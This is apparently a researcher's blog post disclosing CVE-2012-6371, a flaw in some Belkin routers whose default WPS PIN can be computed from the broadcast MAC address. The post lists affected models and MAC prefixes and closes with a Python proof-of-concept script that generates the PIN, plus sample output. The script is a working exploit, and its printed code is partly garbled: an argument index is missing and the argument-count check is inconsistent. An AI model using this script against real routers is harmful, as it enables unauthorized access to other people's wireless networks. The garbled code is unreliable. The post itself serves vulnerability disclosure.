CVE-2012-6371 – Insecure default WPS pin in some Belkin wireless routers
After of the reading of CVE-2012-4366 where a German security researcher showed like an attacker could sniff beacons finding out MAC address of the router, so we would be able to generate this passphrase through of a static substitution table.On the other way, I have not seen this substitution table anywhere so I decided to attempt with another idea for avoiding brute force and it worked! So I asked for a CVE number and here it is : CVE-2012-6371
Moreover we can read his words about last vulnerability (CVE-2012-4366) :
However, in the case of Belkin the default password is calculated solely based on the mac address of the device. Since the mac address is broadcasted with the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network.
Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table. Since the wan mac address is the wlan mac address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase.
Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970)
However, we can use another work of a Chinese guy who discovered a nice trick with the WPS pins. So we can generate WPS pins for BELKIN routers. For example,
We know that MAC address is public, so we can extract the WPS pin by default using the last 6 digits of MAC address following this step:
# python WPSpin.py 51990C [+] WPS pin is : 53475961
Probably most of those routers could be vulnerables as well and other manufacturers.So stay tunned!
At this moment only this version is vulnerable Model : F9K1104v1
UPDATED: (June 2013)
Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
Proof of concept
Here we have a simple PoC with a script in Python:
''' Created on Dec 9, 2012 @author : firstname.lastname@example.org Original work : ZhaoChunsheng 04/07/2012 ''' import sys VERSION = 0 SUBVERSION = 2 def usage(): print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION) print "[*] Usage : python WPSpin.py 123456" sys.exit(0) def wps_pin_checksum(pin): accum = 0 while(pin): accum += 3 * (pin % 10) pin /= 10 accum += pin % 10 pin /= 10 return (10 - accum % 10) % 10 try: if (len(sys.argv) == 6): p = int(sys.argv , 16) % 10000000 print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p)) else: usage() except Exception: usage()
Links pointing here about that vulnerability: